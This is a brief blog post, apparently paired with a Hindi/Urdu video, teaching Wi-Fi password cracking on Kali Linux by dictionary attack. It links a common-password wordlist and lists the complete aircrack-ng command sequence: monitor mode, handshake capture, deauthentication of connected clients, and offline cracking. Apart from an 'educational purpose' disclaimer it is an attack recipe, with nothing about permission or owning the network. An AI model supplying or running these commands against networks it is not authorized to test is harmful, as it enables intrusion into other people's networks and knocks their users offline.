WIFI hacking with Kali Linux : Dictionary Attack | Hindi/Urdu | 2016
WIFI hacking with Kali Linux : Dictionary Attack
-----------------------------------------------------------------------------------------------------------
******This Tutorial is only for Educational Purpose ******
-----------------------------------------------------------------------------------------------------------
Download Wordlist From Here
10k common password Wordlist
http://www.mediafire.com/download/2y9t2u5r1txvd59/10k_most_common.zip
----------------------------------------------------------------------------------------------------------
You Must have Kali Linux Installed or You can Also Run It Live
Also You need
Monitor Mode capable wifi card
If you Don't have Monitor Mode capable wifi card
than you have to buy an external wifi card
such as
Alfa Network AWUS036H
TP-LINK-WN722N USB
--------------------------------------------------------------------------------------
To check
Is your wireless card is capable to be on monitor mode or not
Type in Terminal
airmon-ng
It will show you driver and chipset
------------------------------------------------------------------------------------------
commands are
airmon-ng start wlan0
airmon-ng start kill / airmon-ng check kill
airodump-ng wlan0mon
airodump-ng -c [ch no.] --bssid [BSSID] -w /root/Desktop/anyname wlan0mon
aireplay-ng -0 0 -a [mac address of the wifi router] -c [mac address of the client connected to the router ] wlan0mon
aircrack-ng -w [Location of Wordlist] [Location of captured packet]
------------------------------------------------------------------------------------------------------------------------------------------------------------------
WIFI hacking with Kali Linux : Dictionary Attack | Hindi/Urdu | 2016
Reviewed by Haxbaba Tech
on
06:38
Rating:
No comments: